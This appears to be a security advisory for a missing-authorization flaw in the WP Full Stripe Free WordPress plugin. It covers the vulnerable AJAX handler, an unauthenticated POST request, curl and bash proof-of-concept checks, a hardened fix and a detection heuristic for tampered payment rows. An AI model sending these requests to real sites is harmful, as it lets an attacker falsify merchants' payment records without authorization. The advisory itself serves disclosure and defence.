# CVE-2026-12432: WP Full Stripe Free <= 8.4.3 - Missing Authorization
## Overview
- **CVE ID**: CVE-2026-12432
- **CVSS Score**: 5.3 (Medium)
- **CVSS Vector**: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
- **Affected**: Stripe Payment Forms by WP Full Pay <= 8.4.3
- **Patched**: >= 8.4.4
- **Published**: June 26, 2026
- **Last Updated**: June 27, 2026
- **Researcher**: Netwurm - VTDR e.V.i.G.
## Vulnerability Description
The WP Full Stripe Free plugin for WordPress is vulnerable to **Missing Authorization** in versions up to, and including, **8.4.3** via the `wpfs_update_failed_payment_status` AJAX action.
### Root Cause
The vulnerable AJAX endpoint is registered through both `wp_ajax_` and `wp_ajax_nopriv_` hooks:
```php
// wpfs-customer.php, Line 705-706
add_action( 'wp_ajax_wpfs_update_failed_payment_status', [ $this, 'update_failed_payment_status' ] );
add_action( 'wp_ajax_nopriv_wpfs_update_failed_payment_status', [ $this, 'update_failed_payment_status' ] );
```
The `update_failed_payment_status()` function (lines 3835-3865) performs none of the three checks a WordPress AJAX handler would normally have:
- **No capability check** (no `current_user_can()`)
- **No nonce verification** (no `wp_verify_nonce()` / `check_ajax_referer()`)
- **No logged-in check** (no `is_user_logged_in()`)
### Vulnerable Code
```php
// wpfs-customer.php, Line 3835-3865 (excerpt; elided parts marked with "...")
function update_failed_payment_status() {
    try {
        $result = [];
        $failureCode     = isset( $_POST['failureCode'] ) ? sanitize_text_field( $_POST['failureCode'] ) : null;
        $failureMessage  = isset( $_POST['failureMessage'] ) ? sanitize_text_field( $_POST['failureMessage'] ) : null;
        $paymentIntentId = isset( $_POST['paymentIntentId'] ) ? sanitize_text_field( $_POST['paymentIntentId'] ) : null;
        $paymentIntent   = $this->stripe->retrievePaymentIntent( $paymentIntentId );
        // ... no auth check before processing; $lastCharge is presumably read from $paymentIntent here ...
        $updateData = [
            'paid'     => 0,
            'captured' => 0,
            'refunded' => 0
        ];
        // Attacker can overwrite with controlled values
        if ( $lastCharge ) {
            $updateData['last_charge_status'] = $lastCharge->status;
            $updateData['failure_code']       = $lastCharge->failure_code;
            $updateData['failure_message']    = $lastCharge->failure_message;
        } else {
            // POST-supplied values are stored as-is
            $updateData['last_charge_status'] = 'failed';
            $updateData['failure_code']       = $failureCode;
            $updateData['failure_message']    = $failureMessage;
        }
        $this->db->updatePaymentByEventId( $paymentIntentId, $updateData );
        // ...
    } catch ( Exception $e ) {
        // ... (elided) builds the "Internal Error" JSON response seen in the PoC below ...
    }
}
```
## Attack Vector
### Prerequisites
- Payment Intent ID must be known (exposed in browser during normal Stripe checkout)
- No authentication required
### Attack Steps
1. **Identify Target**: Find WordPress site with WP Full Stripe Free <= 8.4.3 installed
2. **Obtain Payment Intent ID**: Extract from Stripe.js checkout flow or prior transactions
3. **Send Malicious Request**: Craft POST request to admin-ajax.php with attacker-controlled parameters
### HTTP Request
```http
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

action=wpfs_update_failed_payment_status&paymentIntentId=pi_XXXX&failureCode=ATTACKER_CODE&failureMessage=ATTACKER_MESSAGE
```
## Impact Assessment
| Impact Area | Severity | Description |
|-------------|----------|-------------|
| **Integrity** | Medium | Attackers can mark successful payments as failed |
| **Confidentiality** | None | No data exposure |
| **Availability** | Low | Could disrupt business operations |
### Specific Impacts
1. **Payment Record Manipulation**: Attacker can modify payment status from "paid" to "failed"
2. **False Failure Codes**: Attacker can inject arbitrary failure codes/messages
3. **Social Engineering**: Could be used to defraud customers or dispute legitimate charges
4. **Audit Trail Corruption**: Business records can be falsified
## Proof of Concept (curl)
### Basic Detection
```bash
# Test if endpoint is accessible without authentication
curl -s -k -X POST "https://TARGET/wp-admin/admin-ajax.php" \
-d "action=wpfs_update_failed_payment_status" \
-d "paymentIntentId=test_cve202612432" \
-d "failureCode=TEST_CODE" \
-d "failureMessage=TEST_MESSAGE"
# Expected response (vulnerable):
# {"success":false,"messageTitle":"Internal Error","message":"Invalid API Key provided...","exceptionMessage":"..."}
# The key indicator is that the endpoint responds WITHOUT requiring authentication
```
### Full PoC Script
```bash
#!/bin/bash
TARGET="https://TARGET"
# Check if vulnerable
echo "[*] Testing CVE-2026-12432..."
RESPONSE=$(curl -s -k -X POST "$TARGET/wp-admin/admin-ajax.php" \
-d "action=wpfs_update_failed_payment_status" \
-d "paymentIntentId=test_123" \
-d "failureCode=XSS" \
-d "failureMessage=INJECTED")
if echo "$RESPONSE" | grep -q "success"; then
echo "[+] VULNERABLE - Endpoint accessible without auth"
else
echo "[-] Not vulnerable or error"
fi
```
## Remediation
### Immediate Fix
Add authorization check to `wpfs-customer.php` at line 3835:
```php
function update_failed_payment_status() {
    // ADD THIS CHECK
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Unauthorized' );
    }
    // ... rest of function
}
```
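Because the endpoint is also registered under `wp_ajax_nopriv_`, customers who are not logged in call it during checkout, so a capability check by itself would block the legitimate flow as well. The hardened handler below is an added example, not the plugin's or the vendor's code: it ties the call to a nonce issued with the checkout page and takes the stored status only from the PaymentIntent retrieved from Stripe. The nonce action name `wpfs_checkout`, the `latest_charge` expansion, and the response shapes are assumptions; `$this->stripe->retrievePaymentIntent()` and `$this->db->updatePaymentByEventId()` are the calls shown in the vulnerable code.

```php
<?php
// Added example, written as a method of the plugin's customer class (hence $this).
// Assumed: a nonce for action 'wpfs_checkout' is localized into the checkout
// script and posted back as the 'nonce' field.
function update_failed_payment_status() {
    // 1. Bind the request to a real checkout page load. check_ajax_referer()
    //    terminates the request (HTTP 403 / "-1") when the nonce is missing or bad.
    check_ajax_referer( 'wpfs_checkout', 'nonce' );

    $paymentIntentId = isset( $_POST['paymentIntentId'] )
        ? sanitize_text_field( wp_unslash( $_POST['paymentIntentId'] ) )
        : '';

    // 2. Accept only identifiers in Stripe's PaymentIntent format.
    if ( ! preg_match( '/^pi_[A-Za-z0-9]+$/', $paymentIntentId ) ) {
        wp_send_json_error( [ 'message' => 'Invalid payment intent' ], 400 );
    }

    try {
        // 3. Stripe is the source of truth: failureCode / failureMessage from
        //    $_POST are never written to the database.
        $paymentIntent = $this->stripe->retrievePaymentIntent( $paymentIntentId );
        // Assumption: the retrieve call expands latest_charge into a Charge object.
        $lastCharge = $paymentIntent->latest_charge ?? null;

        // 4. A succeeded or still-pending intent must never be flipped to "failed".
        if ( ! $lastCharge || 'failed' !== $lastCharge->status ) {
            wp_send_json_error( [ 'message' => 'Payment is not in a failed state' ], 409 );
        }

        $this->db->updatePaymentByEventId( $paymentIntentId, [
            'paid'               => 0,
            'captured'           => 0,
            'refunded'           => 0,
            'last_charge_status' => $lastCharge->status,
            'failure_code'       => $lastCharge->failure_code,
            'failure_message'    => $lastCharge->failure_message,
        ] );
        wp_send_json_success();
    } catch ( Exception $e ) {
        // 5. Do not echo Stripe exception text (API key errors etc.) to the client.
        error_log( 'wpfs_update_failed_payment_status: ' . $e->getMessage() );
        wp_send_json_error( [ 'message' => 'Internal Error' ], 500 );
    }
}
```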
### Recommended Fix (by vendor)
Update to **WP Full Stripe Free >= 8.4.4**
```bash
# Via WordPress Admin
# Dashboard > Plugins > WP Full Stripe > Update
# Via WP-CLI
wp plugin update wp-full-stripe-free
# Via SSH (WP-CLI, pinned to the patched release)
wp plugin update wp-full-stripe-free --version=8.4.4
```
## Detection
### Manual Check
1. Check plugin version in WordPress admin
2. Review `wp-content/plugins/wp-full-stripe-free/includes/wpfs-customer.php`
3. Look for missing `current_user_can()` before AJAX handlers
### Automated Detection
```bash
# Check if vulnerable version is installed
curl -s https://TARGET/wp-content/plugins/wp-full-stripe-free/readme.txt | grep -i "Stable tag"
# Test AJAX endpoint
curl -s -k -X POST "https://TARGET/wp-admin/admin-ajax.php" \
-d "action=wpfs_update_failed_payment_status" \
-d "paymentIntentId=test" | grep -q "success" && echo "Potentially Vulnerable"
```
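Version checks show whether a site is exposed, not whether it was already hit. The vulnerable `else` branch writes `last_charge_status = 'failed'` together with whatever `failureCode` and `failureMessage` the request carried, whereas values copied from a real Stripe Charge are lowercase snake_case codes such as `card_declined`. The heuristic below is an added example, not part of the advisory or the plugin: it flags payment rows whose failure data cannot have come from Stripe. The column names are the ones the handler writes; the table name and the query that loads the rows are outside the code shown, so the rows here are constructed.

```php
<?php
// Added example: flag "failed" payment records whose failure_code is not a
// Stripe-style code. Rows are constructed; in practice they would be read
// from the plugin's payments table (name not shown in the advisory).
function wpfs_is_suspicious_failure( array $row ): bool {
    if ( 'failed' !== ( $row['last_charge_status'] ?? '' ) ) {
        return false;
    }
    // Stripe decline / failure codes are lowercase snake_case identifiers
    // (card_declined, insufficient_funds, ...). An empty code on a "failed"
    // row, or anything with uppercase, spaces or punctuation, was supplied
    // by the client rather than copied from a Charge object.
    $code = (string) ( $row['failure_code'] ?? '' );
    return 1 !== preg_match( '/^[a-z][a-z0-9_]*$/', $code );
}

function wpfs_find_suspicious_failures( array $rows ): array {
    return array_values( array_filter( $rows, 'wpfs_is_suspicious_failure' ) );
}

// Constructed sample rows using the columns the vulnerable handler writes.
$rows = [
    [ 'id' => 1, 'last_charge_status' => 'succeeded', 'failure_code' => null,            'failure_message' => null ],
    [ 'id' => 2, 'last_charge_status' => 'failed',    'failure_code' => 'card_declined', 'failure_message' => 'Your card was declined.' ],
    [ 'id' => 3, 'last_charge_status' => 'failed',    'failure_code' => 'ATTACKER_CODE', 'failure_message' => 'ATTACKER_MESSAGE' ],
    [ 'id' => 4, 'last_charge_status' => 'failed',    'failure_code' => null,            'failure_message' => null ],
];

foreach ( wpfs_find_suspicious_failures( $rows ) as $row ) {
    // Rows 3 and 4 are reported; reconcile them against Stripe before acting.
    printf( "Review payment %d: code=%s message=%s\n",
        $row['id'], $row['failure_code'] ?? '(none)', $row['failure_message'] ?? '(none)' );
}
```

Flagged rows should be reconciled against the PaymentIntent in the Stripe dashboard or API before restoring their status; a row that Stripe itself reports as failed can carry an empty code only in unusual cases, so treat the result as a review queue rather than proof of tampering.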
## References
- [Wordfence Intelligence](https://www.wordfence.com/threat-intel/vulnerabilities/cve-2026-12432)
- [Plugin Trac](https://plugins.trac.wordpress.org/browser/wp-full-stripe-free/tags/8.4.3/includes/wpfs-customer.php)
- [Patchstack Database](https://patchstack.com/database/)
## W.P.E.F
- [W.P.E.F Telegram channel #1](https://t.me/wpef0)
- [W.P.E.F Telegram channel #2](https://t.me/wpef01)
## Timeline
- **June 26, 2026**: Vulnerability publicly disclosed
- **June 27, 2026**: CVE-2026-12432 published
- **Patch**: Update to >= 8.4.4